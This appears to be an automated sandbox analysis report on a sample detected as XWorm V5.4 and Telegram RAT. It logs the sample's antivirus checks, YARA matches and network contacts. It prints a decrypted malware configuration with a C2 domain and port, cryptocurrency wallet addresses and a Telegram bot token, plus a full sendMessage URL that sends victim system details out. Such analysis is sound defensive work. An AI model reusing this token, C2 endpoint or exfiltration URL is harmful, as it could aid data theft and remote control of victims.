Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595773433.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595773433.0000000000F36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595773433.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067CA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6552, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6552, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6552, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6552, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	true
147.185.221.22	various-wages.gl.at.ply.gg	United States		12087	SALSGIVERUS	true

Contacted Domains

Name	IP	Active
various-wages.gl.at.ply.gg	147.185.221.22	true
api.telegram.org	149.154.167.220	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA0FB38C6050D4C23DA87%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20BSY776%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4	true	Avira URL Cloud: safe	unknown
various-wages.gl.at.ply.gg	true	Avira URL Cloud: safe	unknown

AV Detection

Found malware configuration

Source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: various-wages.gl.at.ply.gg
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: 55202
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: <123456789>
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: <Xwormmm>
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: XWorm V5.4
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: USB.exe
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: bc1q4ul0exh4vcd9z9fchkyc5rud8dtwsgkugpg2hu
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: 0xBAD33b9Ee3C66782641D7662A66557A167543AB8
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: TQHfQNjDo2mPrBMghaWA6fZLJ6zHLwXKn5
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: 7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: 985088883

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbs source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: fSgG.pdbSHA256 source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source:	Binary string: Accessibility.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: n.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb$ source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Configuration.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Xml.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Core.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\fSgG.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.0000000006797000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp, WER7A57.tmp.dmp.13.dr
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb] source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\fSgG.pdbe source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Windows.Forms.pdb\|c source: WER7A57.tmp.dmp.13.dr
